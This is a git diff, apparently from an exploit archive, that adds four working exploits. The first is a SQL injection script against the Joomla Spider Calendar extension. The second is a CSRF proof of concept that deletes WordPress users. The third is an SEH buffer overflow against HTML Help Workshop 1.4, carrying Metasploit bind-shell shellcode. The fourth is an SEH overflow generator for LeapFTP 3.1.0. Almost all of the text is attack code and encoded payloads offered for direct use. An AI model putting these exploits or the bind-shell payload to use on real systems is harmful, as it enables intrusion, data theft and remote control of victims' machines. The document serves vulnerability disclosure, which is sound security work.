'reader':reader} + + +if __name__ == '__main__': + m_oOpts = optparse.OptionParser("%prog -H http[s]://Host_or_IP [-b, --base base_dir] [-p, --port PORT]") + m_oOpts.add_option('--host', '-H', action='store', type='string', + help='The address of the host running Spider Calendar extension(required)') + m_oOpts.add_option('--base', '-b', action='store', type='string', default="/", + help='base dir joomla installation, default "/")') + m_oOpts.add_option('--port', '-p', action='store', type='int', default=0, + help='The port on which the daemon is running (default 80)') + + m_oOptions, remainder = m_oOpts.parse_args() + m_nHost = m_oOptions.host + m_nPort = m_oOptions.port + m_nBase = m_oOptions.base + + if not m_nHost: + print(banner) + print m_oOpts.format_help() + sys.exit(1) + + print(banner) + + if m_nBase != "/": + if m_nBase[0] == "/": + m_nBase = m_nBase[1:] + if m_nBase[-1] == "/": + m_nBase = m_nBase[:-1] + else: + if m_nBase[-1] == "/": + m_nBase = m_nBase[:-1] + m_nBase = '/'+m_nBase+'/' + + # Start connection to host for Joomla Spider Calendar vulnerability + response = connection(m_nHost, m_nBase+com_spidercalendar+'%27').values()[0] + reader = connection(m_nHost, m_nBase+com_spidercalendar+'%27').values()[1] + # Read connection code number + getcode = response.status + + print("[+] Searching for Joomla Spider Calendar vulnerability...") + print("[+]") + + if getcode != 404: + for lines in reader: + if not lines.find("You have an error in your SQL syntax;") == -1: + print("[!] Boolean SQL injection vulnerability FOUND!") + print("[+]") + print("[+] Detection version in progress....") + print("[+]") + + try: + response = connection(m_nHost, m_nBase+ver_spidercalendar).values()[0] + reader = connection(m_nHost, m_nBase+ver_spidercalendar).values()[1] + getcode = response.status + if getcode != 404: + for line_version in reader: + if not line_version.find("") == -1: + VER = re.compile('>(.*?)<').search(line_version).group(1) + VER_REP = VER.replace(".","") + if int(VER_REP[0]) == 1 or int(VER_REP) > 326: + print("[X] VERSION: "+VER) + print("[X] Joomla Spider Calendar <= 1 or >= 3.2.7 are not vulnerable") + sys.exit(1) + elif int(VER_REP[0]) == 2: + print("[+] EXTENSION VERSION: "+VER) + print("[+]") + for cmddesc, cmdsqli in C0mm4nds.items(): + try: + response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[0]).values()[0] + reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[0]).values()[1] + getcode = response.status + if getcode != 404: + for line_response in reader: + if not line_response.find("h0m3l4b1t") == -1: + MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1) + if vuln == 0: + print("[!] "+m_nHost+" VULNERABLE!!!") + print("[+]") + print("[!] "+cmddesc+" : "+MYSQL_VER) + vuln = 1 + except socket.error: + print('[X] Connection was lost please retry') + sys.exit(1) + elif int(VER_REP) == 30: + print("[+] EXTENSION VERSION: "+VER) + print("[+]") + for cmddesc, cmdsqli in C0mm4nds.items(): + try: + response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[1]).values()[0] + reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[1]).values()[1] + getcode = response.status + if getcode != 404: + for line_response in reader: + if not line_response.find("h0m3l4b1t") == -1: + MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1) + if vuln == 0: + print("[!] "+m_nHost+" VULNERABLE!!!") + print("[+]") + print("[!] "+cmddesc+" : "+MYSQL_VER) + vuln = 1 + except socket.error: + print('[X] Connection was lost please retry') + sys.exit(1) + elif int(VER_REP[0]) == 3: + print("[+] EXTENSION VERSION: "+VER) + print("[+]") + for cmddesc, cmdsqli in C0mm4nds.items(): + try: + response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[2]).values()[0] + reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[2]).values()[1] + getcode = response.status + if getcode != 404: + for line_response in reader: + if not line_response.find("h0m3l4b1t") == -1: + MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1) + if vuln == 0: + print("[!] "+m_nHost+" VULNERABLE!!!") + print("[+]") + print("[!] "+cmddesc+" : "+MYSQL_VER) + vuln = 1 + except socket.error: + print('[X] Connection was lost please retry') + sys.exit(1) + else: + print("[-] EXTENSION VERSION: Unknown :(") + sys.exit(0) + + if vuln == 0: + # VERSION NOT VULNERABLE :( + print("[X] Spider Calendar patched or SQLi blocked by Web Application Firewall-") + sys.exit(1) + else: + sys.exit(0) + except socket.error: + print('[X] Connection was lost please retry') + sys.exit(1) + + # NO SQL BLIND DETECTED + print("[X] Spider Calendar patched or SQLi blocked by Web Application Firewall") + sys.exit(1) + else: + print('[X] URL "'+m_nHost+m_nBase+com_spidercalendar+'" NOT FOUND') + sys.exit(1) diff --git a/platforms/php/webapps/34572.txt b/platforms/php/webapps/34572.txt new file mode 100755 index 000000000..7376b8733 --- /dev/null +++ b/platforms/php/webapps/34572.txt @@ -0,0 +1,23 @@ +# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF +# Google Dork: N/A +# Date: 05.09.2014 +# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org +# Vendor Homepage - http://www.speakdigital.co.uk/ +# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/ +# Version: 1.0 +# Tested on: PHP + + +Description: +This plugin will allow administrator to delete user(s) account by entering +their email address. + +Proof of Concept +1. Force the administrator to send below request: + +URL : +http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php +METHOD : POST +REQUEST : de-text=&submit=Search+and+Delete + +* As the result, user with the given email address will be deleted. diff --git a/platforms/windows/local/34489.py b/platforms/windows/local/34489.py new file mode 100755 index 000000000..d9a015b08 --- /dev/null +++ b/platforms/windows/local/34489.py @@ -0,0 +1,76 @@ +import subprocess + +# Exploit Title: HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH) +# Date: 31/08/2014 +# Author: mr.pr0n (@_pr0n_) +# Homepage: http://ghostinthelab.wordpress.com/ +# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx +# Version: 1.4 +# Tested on: Windows XP SP3 / Windows 7 Pro + +junk = "A" * 832 # Junk bytes +nseh = "\xeb\x06\xff\xff" # Overwrite next seh, with jump forward (over the next 6 bytes) instruction +seh = "\xd0\x11\x30\x45" # Overwrite seh with POP ECX,POP ESI,RETN from HHA.dll (Universal) +nops = "\x90" * 10 # Nops + +#msfpayload windows/shell_bind_tcp EXITFUNC=seh R | +#msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff' +shellcode = ("\x89\xe5\xd9\xc4\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +"\x42\x75\x4a\x49\x6b\x4c\x79\x78\x4f\x79\x65\x50\x57\x70" +"\x67\x70\x75\x30\x4c\x49\x58\x65\x30\x31\x69\x42\x30\x64" +"\x6c\x4b\x31\x42\x66\x50\x4e\x6b\x46\x32\x66\x6c\x6e\x6b" +"\x66\x32\x44\x54\x4c\x4b\x50\x72\x44\x68\x64\x4f\x68\x37" +"\x50\x4a\x65\x76\x65\x61\x4b\x4f\x46\x51\x4f\x30\x4e\x4c" +"\x55\x6c\x65\x31\x31\x6c\x36\x62\x44\x6c\x55\x70\x6b\x71" +"\x48\x4f\x44\x4d\x55\x51\x79\x57\x39\x72\x68\x70\x33\x62" +"\x66\x37\x6e\x6b\x42\x72\x36\x70\x6e\x6b\x42\x62\x45\x6c" +"\x56\x61\x68\x50\x6c\x4b\x61\x50\x61\x68\x6c\x45\x4f\x30" +"\x31\x64\x72\x6a\x75\x51\x78\x50\x42\x70\x6e\x6b\x30\x48" +"\x42\x38\x4e\x6b\x73\x68\x61\x30\x76\x61\x6e\x33\x69\x73" +"\x47\x4c\x72\x69\x6e\x6b\x77\x44\x4c\x4b\x65\x51\x79\x46" +"\x34\x71\x79\x6f\x50\x31\x4f\x30\x6c\x6c\x7a\x61\x38\x4f" +"\x54\x4d\x57\x71\x68\x47\x77\x48\x79\x70\x54\x35\x7a\x54" +"\x67\x73\x61\x6d\x79\x68\x65\x6b\x61\x6d\x36\x44\x61\x65" +"\x78\x62\x36\x38\x6e\x6b\x42\x78\x64\x64\x53\x31\x49\x43" +"\x63\x56\x4e\x6b\x66\x6c\x52\x6b\x4c\x4b\x53\x68\x35\x4c" +"\x55\x51\x59\x43\x6c\x4b\x43\x34\x6c\x4b\x57\x71\x38\x50" +"\x4c\x49\x72\x64\x77\x54\x51\x34\x53\x6b\x53\x6b\x50\x61" +"\x63\x69\x32\x7a\x42\x71\x59\x6f\x6b\x50\x36\x38\x71\x4f" +"\x71\x4a\x4e\x6b\x75\x42\x48\x6b\x4e\x66\x51\x4d\x43\x58" +"\x56\x53\x56\x52\x55\x50\x75\x50\x43\x58\x52\x57\x73\x43" +"\x45\x62\x61\x4f\x31\x44\x31\x78\x62\x6c\x43\x47\x66\x46" +"\x34\x47\x49\x6f\x5a\x75\x6c\x78\x6a\x30\x46\x61\x37\x70" +"\x63\x30\x34\x69\x4f\x34\x51\x44\x62\x70\x63\x58\x67\x59" +"\x4d\x50\x52\x4b\x43\x30\x39\x6f\x68\x55\x36\x30\x56\x30" +"\x46\x30\x66\x30\x73\x70\x72\x70\x71\x50\x52\x70\x70\x68" +"\x78\x6a\x44\x4f\x49\x4f\x4d\x30\x49\x6f\x49\x45\x6c\x49" +"\x79\x57\x66\x51\x39\x4b\x51\x43\x70\x68\x76\x62\x47\x70" +"\x66\x71\x33\x6c\x6d\x59\x79\x76\x43\x5a\x72\x30\x66\x36" +"\x36\x37\x52\x48\x69\x52\x4b\x6b\x65\x67\x72\x47\x59\x6f" +"\x69\x45\x76\x33\x31\x47\x62\x48\x6d\x67\x39\x79\x45\x68" +"\x79\x6f\x39\x6f\x4a\x75\x32\x73\x42\x73\x30\x57\x73\x58" +"\x44\x34\x4a\x4c\x55\x6b\x68\x61\x39\x6f\x69\x45\x70\x57" +"\x6b\x39\x4a\x67\x32\x48\x63\x45\x50\x6e\x62\x6d\x65\x31" +"\x39\x6f\x6e\x35\x73\x58\x72\x43\x42\x4d\x30\x64\x43\x30" +"\x6e\x69\x5a\x43\x56\x37\x73\x67\x43\x67\x66\x51\x7a\x56" +"\x33\x5a\x52\x32\x71\x49\x33\x66\x48\x62\x4b\x4d\x73\x56" +"\x59\x57\x72\x64\x66\x44\x47\x4c\x66\x61\x57\x71\x4e\x6d" +"\x67\x34\x31\x34\x46\x70\x79\x56\x75\x50\x57\x34\x70\x54" +"\x62\x70\x36\x36\x32\x76\x42\x76\x57\x36\x76\x36\x42\x6e" +"\x63\x66\x33\x66\x73\x63\x30\x56\x32\x48\x50\x79\x78\x4c" +"\x37\x4f\x4f\x76\x39\x6f\x4e\x35\x6c\x49\x79\x70\x50\x4e" +"\x52\x76\x61\x56\x39\x6f\x50\x30\x61\x78\x36\x68\x6d\x57" +"\x67\x6d\x53\x50\x79\x6f\x38\x55\x6d\x6b\x4b\x4e\x66\x6e" +"\x45\x62\x79\x7a\x33\x58\x59\x36\x4e\x75\x4f\x4d\x4d\x4d" +"\x39\x6f\x59\x45\x55\x6c\x56\x66\x33\x4c\x66\x6a\x6f\x70" +"\x79\x6b\x39\x70\x71\x65\x54\x45\x6d\x6b\x53\x77\x37\x63" +"\x73\x42\x42\x4f\x73\x5a\x77\x70\x70\x53\x79\x6f\x49\x45" +"\x41\x41") + +exploit = junk + nseh + seh + nops + shellcode +subprocess.call(['C:\\Program Files\\HTML Help Workshop\\hhw.exe ',exploit]) + +# EOF diff --git a/platforms/windows/local/34512.py b/platforms/windows/local/34512.py new file mode 100755 index 000000000..7819898bb --- /dev/null +++ b/platforms/windows/local/34512.py @@ -0,0 +1,69 @@ +# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit +# Google Dork: "k3170makan is totally awesome" hehehe +# Date: 2014-08-28 +# Exploit Author: k3170makan +# Vendor Homepage: http://www.leapware.com/ +# Software Link: http://www.leapware.com/download.html +# Version: 3.1.0 +# Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7) +# Timeline: +# * 2014-08-28 : Initial contact +# * 2014-09-01 : no contact +# * 2014-09-01 : public disclosure +""" +This vulnerability was disclosed according to the terms of my public +disclosure policy ( +http://blog.k3170makan.com/p/public-disclosure-policy.html) +""" +from sys import argv +if __name__ == "__main__": +ovTrigger = 1093 +f = open("exploit.txt","w") +f.write("ftp://") +f.write("A"*ovTrigger) +f.write("\xEB\x06\x90\x90") #JMP to payload +f.write("\x44\xD3\x4A\x77") #POP POP RET +f.write("\x90"*30) +#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1 +-b \x00\x0a\x0d\xff +shellcode = "\x89\xe0\xd9\xe8\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49\x49" +\ +"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +\ +"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +\ +"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +\ +"\x42\x75\x4a\x49\x49\x6c\x68\x68\x4f\x79\x35\x50\x53\x30" +\ +"\x45\x50\x35\x30\x6e\x69\x79\x75\x30\x31\x6a\x72\x30\x64" +\ +"\x4c\x4b\x53\x62\x56\x50\x4e\x6b\x76\x32\x56\x6c\x6c\x4b" +\ +"\x42\x72\x62\x34\x6e\x6b\x54\x32\x46\x48\x76\x6f\x6e\x57" +\ +"\x61\x5a\x67\x56\x45\x61\x39\x6f\x64\x71\x4b\x70\x4e\x4c" +\ +"\x55\x6c\x53\x51\x33\x4c\x67\x72\x76\x4c\x51\x30\x59\x51" +\ +"\x38\x4f\x64\x4d\x45\x51\x49\x57\x4d\x32\x58\x70\x56\x32" +\ +"\x70\x57\x4e\x6b\x31\x42\x76\x70\x4e\x6b\x61\x52\x47\x4c" +\ +"\x73\x31\x5a\x70\x4c\x4b\x57\x30\x53\x48\x6c\x45\x4f\x30" +\ +"\x33\x44\x51\x5a\x65\x51\x48\x50\x42\x70\x6e\x6b\x72\x68" +\ +"\x67\x68\x6c\x4b\x30\x58\x47\x50\x77\x71\x5a\x73\x49\x73" +\ +"\x77\x4c\x71\x59\x6e\x6b\x35\x64\x4e\x6b\x57\x71\x4b\x66" +\ +"\x35\x61\x4b\x4f\x34\x71\x4f\x30\x4e\x4c\x59\x51\x4a\x6f" +\ +"\x74\x4d\x75\x51\x58\x47\x44\x78\x59\x70\x62\x55\x68\x74" +\ +"\x33\x33\x61\x6d\x4b\x48\x65\x6b\x33\x4d\x47\x54\x72\x55" +\ +"\x58\x62\x36\x38\x6e\x6b\x32\x78\x35\x74\x55\x51\x4a\x73" +\ +"\x73\x56\x4e\x6b\x66\x6c\x72\x6b\x6e\x6b\x71\x48\x77\x6c" +\ +"\x47\x71\x78\x53\x6e\x6b\x73\x34\x4e\x6b\x75\x51\x5a\x70" +\ +"\x4b\x39\x77\x34\x35\x74\x71\x34\x31\x4b\x51\x4b\x75\x31" +\ +"\x71\x49\x70\x5a\x66\x31\x4b\x4f\x39\x70\x43\x68\x43\x6f" +\ +"\x53\x6a\x4c\x4b\x42\x32\x38\x6b\x4b\x36\x53\x6d\x42\x4a" +\ +"\x36\x61\x4c\x4d\x4b\x35\x68\x39\x65\x50\x35\x50\x55\x50" +\ +"\x70\x50\x52\x48\x76\x51\x6c\x4b\x62\x4f\x6c\x47\x79\x6f" +\ +"\x6e\x35\x6f\x4b\x4a\x50\x4e\x55\x69\x32\x32\x76\x55\x38" +\ +"\x79\x36\x6c\x55\x6f\x4d\x4d\x4d\x6b\x4f\x78\x55\x75\x6c" +\ +"\x73\x36\x31\x6c\x57\x7a\x4b\x30\x79\x6b\x49\x70\x70\x75" +\ +"\x64\x45\x4f\x4b\x63\x77\x37\x63\x62\x52\x52\x4f\x52\x4a" +\ +"\x77\x70\x56\x33\x69\x6f\x4e\x35\x30\x63\x35\x31\x50\x6c" +\ +"\x51\x73\x36\x4e\x45\x35\x44\x38\x33\x55\x53\x30\x41\x41" +f.write(shellcode) +f.flush() +f.close() +#copy contents of exploit.txt to your clipboard and then launch LeapFTP + +Keith Makan +about.me/k3170makan +